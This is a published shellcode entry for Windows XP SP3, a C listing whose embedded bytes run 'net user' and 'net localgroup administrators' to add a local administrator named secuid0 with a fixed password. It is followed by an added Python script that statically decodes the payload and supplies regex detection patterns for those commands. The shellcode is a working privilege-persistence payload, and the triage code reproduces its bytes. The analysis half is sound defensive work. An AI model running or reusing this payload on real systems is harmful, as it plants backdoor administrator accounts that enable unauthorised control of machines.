# Title : win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes
# Published : 2010-10-04
# Author :
/*
Title: win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes
Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com
Method: Hardcoded opcodes (kernel32.winexec@7c8623ad, kernel32.exitprocess@7c81cafa)
Tested on: WinXP Pro SP3 (EN) 32bit - Build 2600.080413-2111
Greetz: offsec and inj3ct0r teams
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
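/* jmp/call/pop stub, WinExec and ExitProcess called at the hardcoded
   addresses above, followed by the NUL-terminated command line */
char code[] = "\xeb\x16\x5b\x31\xc0\x50\x53\xbb\xad\x23"
"\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xfa\xca"
"\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63"
"\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20"
"\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x73"
"\x65\x63\x75\x69\x64\x30\x20\x6d\x30\x6e"
"\x6b\x20\x2f\x61\x64\x64\x20\x26\x26\x20"
"\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67"
"\x72\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e"
"\x69\x73\x74\x72\x61\x74\x6f\x72\x73\x20"
"\x73\x65\x63\x75\x69\x64\x30\x20\x2f\x61"
"\x64\x64\x00";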
int main(int argc, char **argv)
{
((void (*)())code)();
printf("New local admin \tUsername: secuid0\n\t\t\tPassword: m0nk");
return 0;
}
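
Static triage of the listing above, as an added example that is not part of the original entry or the author's code: it checks the jmp/call/pop layout, recovers the hardcoded call targets named in the Method line, and extracts the embedded command line with the account it creates, all without executing anything. The function names and the two regexes are assumptions made for this example; the sample bytes are constructed from the listing.

```python
import re
import struct

# Constructed from the listing: 29-byte stub, then the NUL-terminated command.
STUB = bytes.fromhex("eb165b31c05053bbad23867cffd3"
                     "31c050bbfaca817cffd3e8e5ffffff")
CMD = (b"cmd.exe /c net user secuid0 m0nk /add && "
       b"net localgroup administrators secuid0 /add\x00")
SAMPLE = STUB + CMD

# Hypothetical indicator patterns for account creation and admin-group changes.
NEW_USER = re.compile(r"net\s+user\s+(\S+)\s+\S+\s+/add", re.I)
ADMIN_ADD = re.compile(r"net\s+localgroup\s+administrators\s+(\S+)\s+/add", re.I)

def data_offset(buf):
    """Offset of the data after a jmp short / call back / pop reg stub, or None."""
    if len(buf) < 7 or buf[0] != 0xEB:
        return None
    call_at = 2 + buf[1]                         # jmp short target
    if call_at + 5 > len(buf) or buf[call_at] != 0xE8:
        return None
    rel = struct.unpack_from("<i", buf, call_at + 1)[0]
    dest = call_at + 5 + rel                     # where the call lands
    if dest == 2 and 0x58 <= buf[dest] <= 0x5F:  # pop r32 right after the jmp
        return call_at + 5                       # call's return address = data
    return None

def call_targets(buf):
    """Absolute addresses loaded by `mov ebx, imm32` directly before `call ebx`."""
    return [struct.unpack("<I", m.group(1))[0]
            for m in re.finditer(rb"\xbb(.{4})\xff\xd3", buf, re.DOTALL)]

def triage(buf):
    """Summarise layout, call targets and the embedded command of a payload."""
    off = data_offset(buf)
    cmd = ""
    if off is not None:
        end = buf.find(b"\x00", off)
        cmd = buf[off:end if end != -1 else len(buf)].decode("ascii", "replace")
    user, admin = NEW_USER.search(cmd), ADMIN_ADD.search(cmd)
    return {"data_offset": off, "call_targets": call_targets(buf), "command": cmd,
            "created_user": user.group(1) if user else None,
            "admin_user": admin.group(1) if admin else None}

if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(key, "=", value)
```

The same `net user ... /add` and `net localgroup administrators ... /add` patterns can be applied to process-creation command lines in endpoint logs.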